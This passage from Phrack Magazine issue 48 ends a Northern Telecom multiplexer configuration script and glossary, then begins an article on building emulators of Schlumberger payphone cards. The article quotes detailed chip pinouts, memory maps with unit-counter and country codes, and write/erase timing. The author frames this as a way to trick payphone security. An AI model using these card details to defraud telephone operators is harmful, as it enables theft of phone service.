  7512. TRANSMIT "CGNO12 "
  7513. TRANSMIT "`"EXT ALM`""
  7514. TRANSMIT "!"
  7515. TRANSMIT "CGO12 AN2 G118 !"
  7516. ;also attach to pt 13 for alarm center ID
  7517. TRANSMIT "CGO13 AN2 G118 !"
  7518. ;
  7519. ;DEFINE CUSTOMER INPUTS
  7520. TRANSMIT "CGNI1 "
  7521. TRANSMIT "`"SMOKE DET.`""
  7522. TRANSMIT "!"
  7523. TRANSMIT "CGNI2 "
  7524. TRANSMIT "`"SUMP PUMP`"" 
  7525. TRANSMIT "!" 
  7526. TRANSMIT "CGNI3 " 
  7527. TRANSMIT "`"OPEN DOOR`""
  7528. TRANSMIT "!"
  7529. TRANSMIT "CGNI4 "
  7530. TRANSMIT "`"AC PWR FAIL`""
  7531. TRANSMIT "!"
  7532. TRANSMIT "CGNI5 "
  7533. TRANSMIT "`"HI-LO TEMP`""
  7534. TRANSMIT "!"
  7535. TRANSMIT "CGNI6 "
  7536. TRANSMIT "`"RECT. FAIL`""
  7537. TRANSMIT "!"
  7538. TRANSMIT "CGNI7 "
  7539. TRANSMIT "`"BATT FLOAT`""
  7540. TRANSMIT "!"
  7541. ;
  7542. ;ADD CONDITIONS TO CUSTOMER OUTPUT 1
  7543. TRANSMIT "CGO1 AN2 SS5 !"
  7544. TRANSMIT "CGO1 AN2 SS6 !"
  7545. TRANSMIT "CGO1 AN2 SS7 !"
  7546. ;
  7547. ;ADD CONDITIONS TO CUSTOMER OUTPUT 2
  7548. TRANSMIT "CGO2 AN2 SS1 !"
  7549. TRANSMIT "CGO2 AN2 SS2 !"
  7550. TRANSMIT "CGO2 AN2 SS3 !"
  7551. TRANSMIT "CGO2 AN2 SS4 !"
  7552. ;
  7553.      ;PER JOE OLSZTYN SWITCHING SYSTEMS STAFF
  7554.      ;LEAVE PERFORMANCE MONITORING AT FACTORY DEFAULT
  7555.      ;DISABLE BLUE INSERTION FOR POINT TO POINT SYSTEMS
  7556.      ;IN A MULTIPOINT SYSTEM BLUE INSERTION SHOULD BE ENABLED.
  7557.  
  7558.      ;ENABLE ALARM LOGGER
  7559.      TRANSMIT "CAD!"
  7560.  
  7561.      ;DISABLE BLUE INSERTION NODE 1 DP3019
  7562.      TRANSMIT "CN1 T1 BE!"
  7563.      TRANSMIT "CN1 T2 BE!"
  7564.      TRANSMIT "CN1 T3 BE!"
  7565.  
  7566.      ;ENABLE PARITY CORRECTION NODE 1 DP3020
  7567.      TRANSMIT "CN1 T1 PE!"
  7568.      TRANSMIT "CN1 T2 PE!"
  7569.      TRANSMIT "CN1 T3 PE!"
  7570.  
  7571.      ;ENABLE RX OVERHEAD NODE 1 DP3021
  7572.      TRANSMIT "CN1 T1 RE!"
  7573.      TRANSMIT "CN1 T2 RE!"
  7574.      TRANSMIT "CN1 T3 RE!"
  7575.  
  7576.      ;ENABLE TX OVERHEAD NODE 1 DP3022
  7577.      TRANSMIT "CN1 T1 TE!"
  7578.      TRANSMIT "CN1 T2 TE!"
  7579.      TRANSMIT "CN1 T3 TE!"
  7580.  
  7581.      ;SIGNAL DEGRADE 10E-8 NODE 1 DP3158
  7582.      TRANSMIT "CN1 T1 S8!" 
  7583.      TRANSMIT "CN1 T2 S8!"
  7584.      TRANSMIT "CN1 T3 S8!"
  7585.  
  7586.      ;DISABLE BLUE INSERTION NODE 2 DP3019
  7587.      TRANSMIT "CN2 T1 BE!"
  7588.      TRANSMIT "CN2 T2 BE!"
  7589.      TRANSMIT "CN2 T3 BE!"
  7590.  
  7591.      ;ENABLE PARITY CORRECTION NODE 2 DP3020
  7592.      TRANSMIT "CN2 T1 PE!"
  7593.      TRANSMIT "CN2 T2 PE!"
  7594.      TRANSMIT "CN2 T3 PE!"
  7595.  
  7596.      ;ENABLE RX OVERHEAD NODE 2 DP3021
  7597.      TRANSMIT "CN2 T1 RE!"
  7598.      TRANSMIT "CN2 T2 RE!"
  7599.      TRANSMIT "CN2 T3 RE!"
  7600.  
  7601.      ;ENABLE TX OVERHEAD NODE 2 DP3022
  7602.      TRANSMIT "CN2 T1 TE!"
  7603.      TRANSMIT "CN2 T2 TE!"
  7604.      TRANSMIT "CN2 T3 TE!"
  7605.  
  7606.      ;SIGNAL DEGRADE 10E-8 NODE 2 DP3158
  7607.      TRANSMIT "CN2 T1 S8!" 
  7608.      TRANSMIT "CN2 T2 S8!"
  7609.      TRANSMIT "CN2 T3 S8!"
  7610.  
  7611. ;LINE LEARN ALL MULTIPLEXERS BOTH NODES
  7612. TRANSMIT "CN1 M1 L!"
  7613. TRANSMIT "CN1 M2 L!"
  7614. TRANSMIT "CN1 M3 L!"
  7615. TRANSMIT "CN2 M1 L!"
  7616. TRANSMIT "CN2 M2 L!"
  7617. TRANSMIT "CN2 M3 L!"
  7618.  
  7619. ;CONFIGURATION IS COMPLETE EXIT THE PROGRAM
  7620. CLEAR
  7621. ALARM 1
  7622. LOCATE 10,20
  7623. MESSAGE "......CONFIGURATION COMPLETE......"
  7624. LOCATE 14,17
  7625. MESSAGE "CONTINUE WITH SECTION 5 OF CERTIFICATION"
  7626. ALARM 2
  7627. PAUSE 5
  7628. EXIT
  7629.  
  7630.  
  7631. ----------------------------------------------------------------------------
  7632.             Glossary of Terms
  7633.  
  7634. 4W    Four Wire
  7635. ACO    Alarm Cut-Off
  7636. ACTV    Active (module -- carrying traffic)
  7637. AGC     Automatic Gain Control
  7638. AIS     Alarm Indication Signal -- indicates an alarm upstream
  7639. AMI    Alternate Mark Inversion -- a technique by which the polarity of
  7640.     alternate pulses is inverted
  7641. APD    Avalanche Photo Diode -- used for detecting pulses of light
  7642.     at the receive end of an optical fiber
  7643. AUD    Audible alarm
  7644. BDF    Battery Distribution Frame
  7645. BER    Bit Error Rate
  7646. BIP    Bit Interleave Parity
  7647. BPV    Bipolar Violation -- signal is not alternating as expected
  7648. CAMMS   Centralized Access Maintenance and Monitoring System --
  7649.         a bay-mounted shelf with push buttons and an luminescent display,
  7650.     which is used to control FMT-150 networks, as well as other 
  7651.     Northern Telecom transmission equipment
  7652. CDP    Centralized Display Panel
  7653. CEV    Controlled Environment Vault
  7654. CO    Central Office
  7655. CPC    Common Product Code -- a Northern Telecom code used to identify
  7656.     equipment
  7657. DDD    Direct Distance Dialing
  7658. DM-13   Digital Multiplexer which multiplexes between DS-1/1C/2 signals
  7659.     and DS-3 signals
  7660. DNA    Dynamic Network Architecture
  7661. E2A    A serial interface for alarm polling of equipment
  7662. FE    Frame Error
  7663. FER    Frame Error Rate
  7664. FL    Frame Loss
  7665. FLC     Frame Loss Counter
  7666. FLS    Frame Loss Seconds
  7667. FPD    Future Product to be Developed
  7668. Group    A multiplexed signal made up of four DS-1s, two DS-1Cs, or 
  7669.     one Ds-2
  7670. Hub    An FMT-150 site which branches one 150 Mb/s signal into two or
  7671.     three signals, in different directions, without sacrificing 
  7672.     OA & M continuity
  7673. LBR    Loopback Request
  7674. MCU    Maintenance Control Unit
  7675. MM    Multimode Optical Fiber
  7676. MSB    Most Significant Bit
  7677. Muldem  Multiplexer/demultiplexer
  7678. NRZ    Non-Return to Zero
  7679. OTT    Optical Termination Tray
  7680. PEC    Product Engineering Code -- a Norther Telecom code used to identify
  7681.     equipment.  The preferred code to be used when ordering Northern
  7682.     Telecom equipment.
  7683. PER    Parity Error Rate
  7684. PES    Parity Error Seconds
  7685. RTO    Ready To Order
  7686. SCU    Service Channel Unit
  7687. SMB    Sub-Miniature BNC type connector
  7688. SR    Stuff Request
  7689. STX    (Pseudo) Synchronous Transport Signal: First Level at
  7690.     49.92  Mb/s (Northern Telecom)
  7691. TBOS    Telemetry Byte Oriented System
  7692. VIS    Visual Alarm
  7693. WDM    Wavelength Division Multiplexing
  7694. XOW    Express Orderwire
  7695.  
  7696.                               ==Phrack Magazine==
  7697.  
  7698.                  Volume Seven, Issue Forty-Eight, File 10 of 18
  7699.  
  7700.  
  7701.               Electronic Telephone Cards: How to make your own!
  7702.               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7703.  
  7704. I guess that Sweden is not the only country that employs the electronic
  7705. phone card systems from Schlumberger Technologies. This article will
  7706. explain a bit about the cards they use, and how they work. In the end of
  7707. this article you will also find an UUEncoded file which contains source
  7708. code for a PIC16C84 micro-controller program that completely emulates a
  7709. Schlumberger Telephone card and of course printed circuit board layouts
  7710. + a component list... But before we begin talking seriously of this
  7711. matter I must first make it completely clear that whatever you use this
  7712. information for, is entirely YOUR responsibility, and I cannot be held
  7713. liable for any problems that the use of this information can cause for
  7714. you or for anybody else. In other words: I give this away FOR FREE, and
  7715. I don't expect to get ANYTHING back in return!
  7716.  
  7717. The Original Telephone Card:
  7718. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7719. Since I probably would have had a hard time writing a better article
  7720. than the one Stephane Bausson from France wrote a while ago, I will not
  7721. attempt to give a better explanation than that one; I will instead
  7722. incorporate it in this phile, but I do want to make it clear that the
  7723. following part about the cards technical specification was not written
  7724. by me: Merely the parts in quotes are things added by me... Instead I
  7725. will concentrate on explaining how to build your own telephone card
  7726. emulator and how the security measures in the payphone system created by
  7727. Schlumberger Technologies work, and how to trick it... But first, let's
  7728. have a look at the technical specifications of the various "smart memory
  7729. card" systems used for the payphones.
  7730.  
  7731.  
  7732. <Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr)>
  7733. ------------------------------------------------------------------------------
  7734.  
  7735. ===============================================================================
  7736.           What you need to know about electronics telecards
  7737. ===============================================================================
  7738.  
  7739. (C) 10-07-1993 / 03-1994
  7740. Version 1.06
  7741. Stephane BAUSSON
  7742.  
  7743. Email: sbausson@ensem.u-nancy.fr
  7744. Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
  7745. Phone: (33)-29-06-09-89
  7746. -------------------------------------------------------------------------------
  7747.     Any suggestions or comments about phonecards and smart-cards are welcome
  7748. -------------------------------------------------------------------------------
  7749.  
  7750.                   Content
  7751.                  ---------
  7752.  
  7753. I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur:
  7754.  
  7755.     I-1) Introduction:
  7756.     I-2) SCHEMATICS of the chip:
  7757.     I-3) PINOUT of the connector:
  7758.     I-4) Main features:
  7759.     I-5) TIME DIAGRAMS:
  7760.     I-6) Memory MAP of cards from France and Monaco:
  7761.     I-5) Memory MAP of cards from other countries:
  7762.  
  7763. II ) The cards from ODS: (German cards)
  7764.  
  7765.     II-1) Introduction:
  7766.     II-2) Pinout:
  7767.     II-3) Main features:
  7768.     II-4) Time Diagrams:
  7769.     II-5) Memory Map:
  7770.     II-6) Electrical features:
  7771.  
  7772.  
  7773. III) The Reader Schematic:
  7774.  
  7775. IV) The program:
  7776.  
  7777. -------------------------------------------------------------------------------
  7778.  
  7779. I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
  7780.     ======================================================================
  7781.  
  7782.     I-1) Introduction:
  7783.      ------------
  7784.  
  7785.        You must not think that the electronics phone-cards are
  7786. completely secret things, and that you can not read the information that
  7787. is inside. It is quite false, since in fact an electronic phonecard does
  7788. not contain any secret information like credit cards, and an electronic
  7789. phonecard is nothing else than a 256 bit EPROM with serial output.
  7790.  
  7791.        Besides do not think that you are going to refill them when you
  7792. understand how they work, since for that you should reset the 256 bits
  7793. of the cards by erasing the whole card. But the chip is coated in UV
  7794. opaqued resin even if sometimes you can see it as transparent! Even if
  7795. you were smart enough to erase the 256 bits of the card you should
  7796. program the manufacturer area, but this is quite impossible since these
  7797. first 96 bits are write protected by a lock-out fuse that is fused after
  7798. the card programming in factory.
  7799.  
  7800.        Nevertheless it can be very interesting to study how these cards
  7801. work, to see which kind of data are inside and how the data are mapped
  7802. inside or to see how many units are left inside for example. Besides
  7803. there are a great number of applications of these cards when there are
  7804. used (only for personal usage of course) , since you can use them as key
  7805. to open a door, or you can also use them as key to secure a program,
  7806. etc...
  7807.  
  7808.        These Telecards have been created in 1984 and at this time
  7809. constructors decided to build these cards in NMOS technology but now,
  7810. they plan to change by 1994 all readers in the public to booths and use
  7811. CMOS technology. Also they plan to use EEPROM to secure the cards and to
  7812. add many useful informations in, and you will perhaps use phone cards to
  7813. buy you bread or any thing else.
  7814.  
  7815. These cards are called Second Generation Telecards.
  7816.  
  7817.  
  7818.     I-2) SCHEMATICS of the chip:
  7819.      ----------------------
  7820.  
  7821.             .-------------------.
  7822.             |                   |
  7823.           --|> Clk              |
  7824.             | _                 |
  7825.           --| R/W               |
  7826.             |                   |
  7827.           --| Reset             |
  7828.             |                   |
  7829.           --| Fuse              |
  7830.             |                   |
  7831.           --| Vpp               |
  7832.             |                   |
  7833.             |                   |
  7834.             '-.               .-'
  7835.               |               |
  7836.             .-------------------.
  7837.             |               Out |-- serial output
  7838.             '-------------------'
  7839.  
  7840.  
  7841.     I-3) PINOUT of the connector:
  7842.     -------------------------
  7843.  
  7844.  
  7845.       AFNOR CHIP                                   ISO CHIP
  7846.       ----------                                   --------
  7847.  
  7848.  -------------+-------------                 -------------+-------------
  7849. |   8         |         4   |               |   1         |         5   |
  7850. |             |             |               |             |             |
  7851. +-------\     |     /-------+               +-------\     |     /-------+
  7852. |   7    +----+----+    3   |               |   2    +----+    +    6   |
  7853. |        |         |        |               |        |         |        |
  7854. +--------|         |--------+               +--------|         |--------+
  7855. |   6    |         |    2   |               |   3    |         |    7   |
  7856. |        +    +----+        |               |        +----+----+        |
  7857. +-------/     |     \-------+               +-------/     |     \-------+
  7858. |   5         |         1   |               |   4         |         8   |
  7859. |             |             |               |             |             |
  7860.  -------------+-------------                 -------------+-------------
  7861.  
  7862.                      NB: only the position of the chip is ISO
  7863.                      standardized and not the pinout
  7864.  
  7865. PINOUT:    1 : Vcc = 5V        5 : Gnd
  7866. ------     2 : R/W             6 : Vpp = 21V
  7867.        3 : Clock           7 : I/O
  7868.        4 : Reset           8 : Fuse
  7869.  
  7870.     I-4) Main features:
  7871.     ---------------
  7872.  
  7873.     - Synchronous protocol.
  7874.     - N-MOS technology.
  7875.     - 256x1 bit organization.
  7876.     - 96 written protected by a lock-out fuse.
  7877.     - Low power 85mW in read mode.
  7878.     - 21 V programming voltage.
  7879.     - Access time: 500ns
  7880.     - Operating range: -100C +700C
  7881.     - Ten year data retention.
  7882.  
  7883.  
  7884.     I-5) TIME DIAGRAMS:
  7885.     ---------------
  7886.  
  7887. +21V                                     _____________
  7888. +5V ____________________________________|             |_________________ Vpp
  7889.                     :             :
  7890. +5V                  ___________________:_____________:_________________ Reset
  7891. 0V  ________________|                   :             :
  7892.             :                   :             :
  7893. +5V     ____        :      ____         :       ______:______
  7894. 0V  ___|    |_______:_____|    |________:______|      :      |__________ Clock
  7895.        :    :       :     :    :        :      :      :      :
  7896. +5V    :    :       :     :    :        :______:______:      :           _
  7897. 0V  ___:____:_______:_____:____:________|      :      |______:__________ R/W
  7898.        :    :       :     :    :        :      :      :      :
  7899. +5V    :    :       :_____:    :________:      :      :      :__________
  7900. 0V  XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
  7901.        :    :       :     :    :        :<-----><---->:      :
  7902.        :    :       :     :    :        :10 to   10 to       :
  7903.        :    :       :     :    :        :50 ms   50ms        :
  7904.     Reset        Bit 1        Bit2                           Bit 3
  7905.     card        reading      reading  Bit2 writing to 1     reading
  7906.  
  7907.  
  7908.  
  7909.     I-6) MEMORY MAP of cards from France and Monaco:
  7910.     --------------------------------------------
  7911.  
  7912. Bytes       Bits      Binary     Hexa
  7913.  
  7914.             +-----------+-----+
  7915.   1        1 --> 8  |           |     | ---> Builder code.
  7916.             +-----------+-----+
  7917.   2       9 --> 16  | 0000 0011 | $03 | ---> a French telecard
  7918.             +-----------+-----+
  7919.   3      17 --> 24  |           |     |
  7920.             +-----------+-----+
  7921.   4      25 --> 32  |           |     |
  7922.             +-----------+-----+
  7923.   5      33 --> 40  |           |     |
  7924.             +-----------+-----+
  7925.   6      41 --> 48  |           |     |
  7926.             +-----------+-----+
  7927.   7      49 --> 56  |           |     |
  7928.             +-----------+-----+
  7929.   8      57 --> 64  |           |     |
  7930.             +-----------+-----+
  7931.   9      65 --> 72  |           |     |
  7932.             +-----------+-----+
  7933.  10      73 --> 80  |           |     |
  7934.             +-----------+-----+
  7935.  11      81 --> 88  |           |     |
  7936.             +-----------+-----+
  7937.  12      33 --> 40  | 0001 0011 | $13 | ---> 120 units card
  7938.             | 0000 0110 | $06 | --->  50 units card
  7939.             | 0000 0101 | $05 | --->  40 units card
  7940.             +-----------+-----+
  7941.  13-31  97 --> 248  |           |     | ---> The units area: each time a unit
  7942.             |           |     |      is used, then a bit is set to "1";
  7943.                     |           |     |      Generally the first ten units are
  7944.             |           |     |      fused in factory as test.
  7945.             |           |     |
  7946.             |           |     |
  7947.             |           |     |
  7948.             +-----------+-----+
  7949.  32    249 --> 256  | 1111 1111 | $FF | ---> the card is empty
  7950.             +-----------+-----+
  7951.  
  7952.  
  7953.  
  7954.     I-7) MEMORY MAP of the other cards:
  7955.     -------------------------------
  7956.  
  7957. Bytes       Bits      Binary     Hexa
  7958.  
  7959.             +-----------+-----+
  7960.   1        1 --> 8  |           |     |
  7961.             +-----------+-----+
  7962.   2       9 --> 16  | 1000 0011 | $83 | ---> a telecard
  7963.             +-----------+-----+-----------+-----+
  7964. 3-4      17 --> 32  | 1000 0000 | $80 | 0001 0010 | $12 | ---> 10 units card
  7965.             |           |     | 0010 0100 | $24 | ---> 22 units card
  7966.             |           |     | 0010 0111 | $27 | ---> 25 units card
  7967.             |           |     | 0011 0010 | $32 | ---> 30 units card
  7968.             |           |     | 0101 0010 | $52 | ---> 50 units card
  7969.             |           |     | 1000 0010 | $82 | ---> 80 units card
  7970.             | 1000 0001 | $81 | 0000 0010 | $02 | ---> 100 units card
  7971.             |           |     | 0101 0010 | $52 | ---> 150 units card
  7972.             +-----------+-----+-----------+-----+
  7973.   5      33 --> 40  |           |     |
  7974.             +-----------+-----+
  7975.   6      41 --> 48  |           |     |
  7976.             +-----------+-----+
  7977.   7      49 --> 56  |           |     |
  7978.             +-----------+-----+
  7979.   8      57 --> 64  |           |     |
  7980.             +-----------+-----+
  7981.   9      65 --> 72  |           |     |
  7982.             +-----------+-----+
  7983.  10      73 --> 80  |           |     |
  7984.             +-----------+-----+
  7985.  11      81 --> 88  |           |     |
  7986.             +-----------+-----+
  7987.  12      89 --> 96  | 0001 1110 | $1E | ---> Sweden
  7988.             | 0010 0010 | $22 | ---> Spain
  7989.             | 0011 0000 | $30 | ---> Norway
  7990.             | 0011 0011 | $33 | ---> Andorra
  7991.             | 0011 1100 | $3C | ---> Ireland
  7992.             | 0100 0111 | $47 | ---> Portugal
  7993.             | 0101 0101 | $55 | ---> Czech Republic
  7994.             | 0101 1111 | $5F | ---> Gabon
  7995.             | 0110 0101 | $65 | ---> Finland
  7996.             +-----------+-----+
  7997.  13-31  97 --> 248  |           |     | ---> The units area: each time a unit
  7998.             |           |     |      is used, then a bit is set to "1";
  7999.             |           |     |
  8000.             |           |     |      Generally the first two units are
  8001.             |           |     |      fused in factory as test.
  8002.             |           |     |
  8003.             |           |     |
  8004.             +-----------+-----+
  8005.  32    249 --> 256  | 0000 0000 | $00 |
  8006.             +-----------+-----+
  8007.  
  8008.  
  8009.  
  8010. II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme,
  8011.      =============================================================
  8012.      Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme:
  8013.      ===========================================================
  8014.  
  8015.     II-1) Introduction:
  8016.       ------------
  8017.  
  8018.         These cards are in fact 128 bit memory in NMOS technology, and
  8019. the map of these cards are the following:
  8020.  
  8021.            64 bit EPROM written protected (manufacturer area).
  8022.            40 bit EEPROM (5x8 bits).
  8023.            24 bits set to "1".
  8024.  
  8025.  
  8026.     II-2) Pinout:
  8027.      --------
  8028.  
  8029.        ISO 7816-2
  8030.  
  8031.   -------------+-------------
  8032.  |   1         |         5   |        Pinout:
  8033.  |             |             |        -------
  8034.  +-------\     |     /-------+
  8035.  |   2    +----+    +    6   |          1 : Vcc = 5V    5 : Gnd
  8036.  |        |         |        |          2 : Reset       6 : n.c.
  8037.  +--------|         |--------+          3 : Clock       7 : I/O
  8038.  |   3    |         |    7   |          4 : n.c.        8 : n.c.
  8039.  |        +----+----+        |
  8040.  +-------/     |     \-------+      n.c. : not connected
  8041.  |   4         |         8   |
  8042.  |             |             |
  8043.   -------------+-------------
  8044.  
  8045.  
  8046.     II-3) Main features:
  8047.      ---------------
  8048.  
  8049.     - ISO 7816- 1/2 compatible.
  8050.     - use a single 5V power supply.
  8051.     - low power consumption.
  8052.     - NMOS technology.
  8053.  
  8054.     II-4) Time Diagrams:
  8055.     ----------------
  8056.  
  8057. Reset:
  8058. ------
  8059.   The address counter is reset to 0 when the clock line CLK is raised
  8060. while the control line R is high. Note that the address counter can not
  8061. be reset when it is in the range 0 to 7.
  8062.  
  8063.       __________________
  8064. _____|                  |_____________________________________________ Reset
  8065.      :                  :
  8066.      :        _____     :  _____       _____       _____       _____
  8067. _____:_______|     |____:_|     |_____|     |_____|     |_____|     |_ Clk
  8068.      :       :          : :     :     :     :     :     :     :     :
  8069. _____:_______:__________:_:_____:_____:_____:_____:_____:_____:_____:_
  8070. _____:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_:_ (Address)
  8071.      :                  :       :           :           :           :
  8072. _____:                  :_______:___________:___________:___________:_
  8073. _____XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________|_ Data
  8074. Bit n                      Bit 0    Bit 1        Bit2       Bit3
  8075.  
  8076.    The address counter is incremented by 1 with each rising edge of the
  8077. clock signal Clk, for as long as the control line R remains low. The
  8078. data held in each addressed bit is output to I/O contact each time Clk
  8079. falls. It is not impossible to decrement the address counter, therefore
  8080. to address an earlier bit, the address counter must be reset then
  8081. incremented to require value.
  8082.  
  8083.  
  8084. Write:
  8085. ------
  8086.    All unwritten or erased bits in the address 64-104 may be unwritten
  8087. to. When a memory cell is unwritten to, it is set to 0. The addressed
  8088. cell is unwritten to by the following sequence.
  8089.  
  8090. 1- R is raised while Clk is low, to disable address counter increment
  8091. for one clock pulse.
  8092.  
  8093. 2- Clk is then raised for a minimum of 10ms to write to the address bit.
  8094.  
  8095. When to write operation ends, and Clk falls, the address counter is
  8096. unlocked, and the content of the written cell, which is now 0, is output
  8097. to I/O contact if the operation is correct.
  8098.  
  8099. The next Clk pulse will increment the address by one, then the write
  8100. sequence can be repeated to write the next bit.
  8101.  
  8102.           _____                                _____
  8103. ____________|     |______________________________|     |_______________ Reset
  8104.             :                                    :
  8105.     ___     :           _____           ___      :           _____
  8106. ___|   |____:__________|     |_________|   |_____:__________|     |____ Clk
  8107.    :        :          :     :         :   :     :          :     :
  8108. ___:________:__________:_____:_________:___:_____:__________:_____:_____
  8109. n  |      n+1          |     n+2       |   :    n+3         |     :      (Addr)
  8110. ---'--------:----------'-----:---------'---:-----:----------'-----:-----
  8111.             :          :     :             :     :          :     :
  8112. ________   _:          :     : ____________:  ___:          :     :
  8113. ________XXX_XXXXXXXXXXXXXXXXXXX____________ XX___XXXXXXXXXXXXXXXXXXXXXXX I/O
  8114.   n      n+1           :     :     n+1        n+2           :     :
  8115.                        :     :                              :     :
  8116.                         write                                write
  8117.  
  8118.  
  8119. WriteCarry:
  8120. -----------
  8121.  
  8122.    A counter is erased by performing the WRITECARRY sequence on the
  8123. stage of the next highest weighing to that to be erased.
  8124.  
  8125. The writecarry sequence is as follows:
  8126.  
  8127. 1 - Set the address counter to an unwritten bit in the next highest
  8128. counter stage to that to be erased.
  8129.  
  8130. 2 - Increment is disabled on the following rising edge of R where Clk
  8131. remains low.
  8132.  
  8133. 3 - Clk is then raised for a minimum of 10ms, while R is low, to write
  8134. to the next address bit.
  8135.  
  8136. 4 - R is the raised again while Clk remains low to disable increment a
  8137. second time.
  8138.  
  8139. 5 - Clk is the raised for a minimum of 1ms, while R is low, to write to
  8140. the addressed bit a second time, erasing the counter level immediately
  8141. below that the addressed bit.
  8142.  
  8143.        _____                      _____
  8144. ______|     |____________________|     |_________________________________  Rst
  8145.       :                          :
  8146.       :            _______       :              _______        ___
  8147. ______:___________|       |______:_____________|       |______|   |______  Clk
  8148.       :           :       :      :             :       :      :   :
  8149.       :           :       :      :             :       :      :   :
  8150. <------------------------- address n ------------------------>:<--- n+1 ------
  8151.       :           :       :      :             :       :          :
  8152.       :           :       :      :             :       :          :
  8153. ______:           :       :______:             :       :__________: _____
  8154. ______XXXXXXXXXXXXXXXXXXXXX______XXXXXXXXXXXXXXXXXXXXXXX__________XX_____  I/O
  8155.           :       :  n                 :       :     n        n+1
  8156.           :       :                    :       :
  8157.             Write                        Erase
  8158.  
  8159.      II-5) Memory Map:
  8160.      -------------
  8161.  
  8162. Bytes       Bits      Binary     Hexa
  8163.  
  8164.             +-----------+-----+
  8165.   1       1 -->   8 |           |     |
  8166.             +-----------+-----+
  8167.   2       9 -->  16 | 0010 1111 | $2F | ---> Germany
  8168.             | 0011 0111 | $37 | ---> Netherland
  8169.             | 0011 1011 | $3B | ---> Greece
  8170.             +-----------+-----+
  8171.   3      17 -->  24 |           |     |
  8172.   4      25 -->  32 |           |     | ---> Issuer area (written protected)
  8173.   5      33 -->  40 |           |     |
  8174.   6      41 -->  48 |           |     |
  8175.   7      49 -->  56 |           |     |
  8176.   8      57 -->  64 |           |     |
  8177.             +-----------+-----+
  8178.   9      65 -->  72 |           |     | ---> c4096  )
  8179.  10      73 -->  80 |           |     | --->  c512  )
  8180.  11      81 -->  88 |           |     | --->   c64  ) 5 stage octal counter
  8181.  12      89 -->  96 |           |     | --->    c8  )
  8182.  13      97 --> 104 |           |     | --->    c0  )
  8183.             +-----------+-----+
  8184.  14     105 --> 112 | 1111 1111 | $FF |
  8185.  15     113 --> 120 | 1111 1111 | $FF | ---> area of bits set to "1"
  8186.  16     120 --> 128 | 1111 1111 | $FF |
  8187.             +-----------+-----+
  8188.  
  8189. The Issuer area:
  8190. ----------------
  8191.  
  8192.     This issuer consists of 40 bits. The contents of the issuer area are
  8193. specified by the card issuer, and are fixed during the manufacturing
  8194. process. The contents of the issuer area will include data such as
  8195. serial numbers, dates, and distribution centers.
  8196.  
  8197. This area may only be read.
  8198.  
  8199. The Counter area:
  8200. -----------------
  8201.  
  8202.    The counter area stores the card's units. Its initial value is
  8203. specified by the card issuer and set during manufacturing.
  8204.  
  8205. The counter area is divided into a 5 stage abacus.
  8206.  
  8207. Note that you can only decrease the counter and it is not authorized to
  8208. write in the counter a value greater than the old value.
  8209.  
  8210.  
  8211.     I-6) Electrical features:
  8212.     --------------------
  8213.  
  8214. Maximum ratings:
  8215. ----------------
  8216.  
  8217.                +--------+------+------+------+
  8218.                | Symbol | Min  |  Max | Unit |
  8219. +----------------------+--------+------+------+------+
  8220. | Supply voltage       |   Vcc  | -0.3 |    6 |   V  |
  8221. +----------------------+--------+------+------+------+
  8222. | Input voltage        |   Vss  | -0.3 |    6 |   V  |
  8223. +----------------------+--------+------+------+------+
  8224. | Storage temperature  |  Tstg  |  -20 |  +55 |  0C  |
  8225. +----------------------+--------+------+------+------+
  8226. | Power dissipation   |    Pd  |   -  |   50 |  mW  |
  8227. +----------------------+--------+------+------+------+
  8228.  
  8229.  
  8230. DC characteristics:
  8231. ------------------
  8232.                 +--------+-----+-----+-----+------+
  8233.                 | Symbol | Min.| Typ.| Max.| Unit |
  8234. +---------------------------+--------+-----+-----+-----+------+
  8235. | Supply current            |   Icc  |  -  |  -  |   5 |   mA |
  8236. +---------------------------+--------+-----+-----+-----+------+
  8237. | Input Voltage (low)       |    Vl  |   0 |  -  | 0.8 |    V |
  8238. +---------------------------+--------+-----+-----+-----+------+
  8239. | Input voltage (high)      |    Vh  | 3.5 |  -  | Vcc |    V |
  8240. +---------------------------+--------+-----+-----+-----+------+
  8241. | Input current R           |    Ih  |  -  |  -  | 100 |   uA |
  8242. +---------------------------+--------+-----+-----+-----+------+
  8243. | Input current Clk         |    Il  |  -  |  -  | 100 |   uA |
  8244. +---------------------------+--------+-----+-----+-----+------+
  8245. | Output current (Vol=0.5V) |   Iol  |  -  |  -  |  10 |   uA |
  8246. +---------------------------+--------+-----+-----+-----+------+
  8247. | Output current (Voh=5V)   |   Ioh  |  -  |  -  | 0.5 |   mA |
  8248. +---------------------------+--------+-----+-----+-----+------+
  8249.  
  8250. AC characteristics:
  8251. ------------------     +--------+------+------+------+
  8252.                | Symbol | Min. | Max. | Unit |
  8253. +----------------------+--------+------+------+------+
  8254. | Pulse duration       |    tr  |   50 |   -  |  us  |
  8255. | R address reset      |        |      |      |      |
  8256. +----------------------+--------+------+------+------+
  8257. | Pulse duration       |    ts  |   10 |   -  |  us  |
  8258. | R write              |        |      |      |      |
  8259. +----------------------+--------+------+------+------+
  8260. | High level Clk       |    th  |    8 |   -  |  us  |
  8261. +----------------------+--------+------+------+------+
  8262. | Low level Clk        |    tl  |   12 |   -  |  us  |
  8263. +----------------------+--------+------+------+------+
  8264. | Write window         | Twrite |   10 |   -  |  ms  |
  8265. +----------------------+--------+------+------+------+
  8266. | Erase window         | Terase |   10 |   -  |  ms  |
  8267. +----------------------+--------+------+------+------+
  8268. |                      |   tv1  |    5 |   -  |  us  |
  8269. +----------------------+--------+------+------+------+
  8270. |                      |   tv2  |  3.5 |   -  |  us  |
  8271. +----------------------+--------+------+------+------+
  8272. |                      |   tv3  |  3.5 |   -  |  us  |
  8273. +----------------------+--------+------+------+------+
  8274. |                      |   tv4  |  3.5 |   -  |  us  |
  8275. +----------------------+--------+------+------+------+
  8276. |                      |   tv5  |  3.5 |   -  |  us  |
  8277. +----------------------+--------+------+------+------+
